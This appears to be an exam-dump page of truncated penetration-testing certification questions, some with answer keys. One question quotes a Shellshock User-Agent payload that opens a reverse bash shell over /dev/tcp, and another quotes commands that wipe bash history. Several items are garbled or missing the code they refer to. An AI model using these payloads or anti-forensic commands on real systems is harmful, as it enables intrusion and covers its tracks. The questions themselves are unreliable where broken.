- All Exams Instant Download
Which of the following is the BEST action for the penetration tester to take?
autonumA penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier. Which of the following is the BEST action for the penetration tester to take?A . Utilize the...
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
autonumA penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci>& /dev/tcp/127.0.0.1/9090 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”} Which of the following edits should the tester make to the...
autonumWhich of the following tools should a penetration tester use to crawl a website and build a wordlist using the data recovered to crack the password on the website?
autonumWhich of the following tools should a penetration tester use to crawl a website and build a wordlist using the data recovered to crack the password on the website?A . DirBusterB . CeWLC . w3afD . PatatorView AnswerAnswer: B Explanation: CeWL, the Custom Word List Generator, is a Ruby application...
Which of the following tools would be BEST suited for this task?
autonumA penetration tester was contracted to test a proprietary application for buffer overflow vulnerabilities. Which of the following tools would be BEST suited for this task?A . GDBB . Burp SuiteC . SearchSpliotD . NetcatView AnswerAnswer: A
Which of the following techniques should the tester select to accomplish this task?
autonumA penetration tester wants to validate the effectiveness of a DLP product by attempting exfiltration of data using email attachments. Which of the following techniques should the tester select to accomplish this task?A . SteganographyB . Metadata removalC . EncryptionD . Encode64View AnswerAnswer: B Explanation: All other answers are a...
Which of the following would be the BEST command to use for further progress into the targeted network?
autonumA CentOS computer was exploited during a penetration test. During initial reconnaissance, the penetration tester discovered that port 25 was open on an internal Sendmail server. To remain stealthy, the tester ran the following command from the attack machine: Which of the following would be the BEST command to use...
Which of the following actions is the tester MOST likely performing?
autonumA penetration tester gains access to a system and establishes persistence, and then runs the following commands: cat /dev/null > temp touch Cr .bash_history temp mv temp .bash_history Which of the following actions is the tester MOST likely performing?A . Redirecting Bash history to /dev/nullB . Making a copy of...
Which of the following data structures is systems?
autonumGiven the following code: Which of the following data structures is systems?A . A tupleB . A treeC . An arrayD . A dictionaryView AnswerAnswer: C
Which of the following methods should the tester use to visualize the authorization information being transmitted?
autonumA penetration tester captured the following traffic during a web-application test: Which of the following methods should the tester use to visualize the authorization information being transmitted?A . Decode the authorization header using UTF-8.B . Decrypt the authorization header using bcrypt.C . Decode the authorization header using Base64.D . Decrypt...
Which of the following changes should the tester apply to make the script work as intended?
autonumA penetration tester downloaded the following Perl script that can be used to identify vulnerabilities in network switches. However, the script is not working properly. Which of the following changes should the tester apply to make the script work as intended?A . Change line 2 to $ip= 10.192.168.254;B . Remove...
